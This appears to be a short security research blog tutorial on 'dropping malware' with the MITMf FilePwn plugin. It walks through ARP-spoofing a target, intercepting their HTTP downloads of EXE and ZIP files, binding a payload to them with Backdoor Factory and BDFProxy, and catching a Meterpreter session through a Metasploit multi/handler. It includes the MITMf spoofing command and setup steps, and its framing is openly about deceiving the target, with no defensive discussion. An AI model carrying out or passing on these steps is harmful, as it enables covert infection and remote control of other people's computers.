Dropping Malware with MITMf FilePwn | Lucideus Research

Introduction

FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
What if your target is downloading some files and you want to send him a payload but you don’t want him to know what is happening, FilePwn allows us to do exactly this, it can patch EXE and ZIP files with our payload and then the user downloads his file but with it he also downloads our payload which is binded with the original file.
Workflow :
Target downloads an exe or zip file
-> File is intercepted by MITMf FilePwn
-> Our payload is binded with the original file
-> User executes the file he/she downloaded
-> Our payload executes and then the original exe is executed


Working
FilePwn is actually based on two other tools:
  • The Backdoor Factory
  • BDFProxy
The Backdoor Factory
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
BDFProxy
BDFProxy intercepts exe and zip files using mitm.
PoC
  • Setup Virtual Environment for MITMf
    mkvirtualenv MITMf -p /usr/bin/python2.7
    This step is only required if MITMf is installed from Github



  • Start Metasploit-Framework and load msgrpc module
  • Locate and edit mitm.conf and change MSGRPC Password
  • Scroll down and change LHOST under [[FilePwn]] section in mitm.conf

  • Start Msfconsole and setup multi/handler
  • Start MITMf FilePwn
    Python mitmf.py --spoof --arp -i eth0 --gateway IP --target IP --filepwn
  • Now build a exe using c programming language
  • Now lets upload this exe on a HTTP based free file sharing website such as zippyshare
  • Now we will try to download this exe from the generated link


  • As soon as we start downloading this file we get logs in MITMf terminal
  • After patching…
  • As soon as the target executes the exe we get a meterpreter session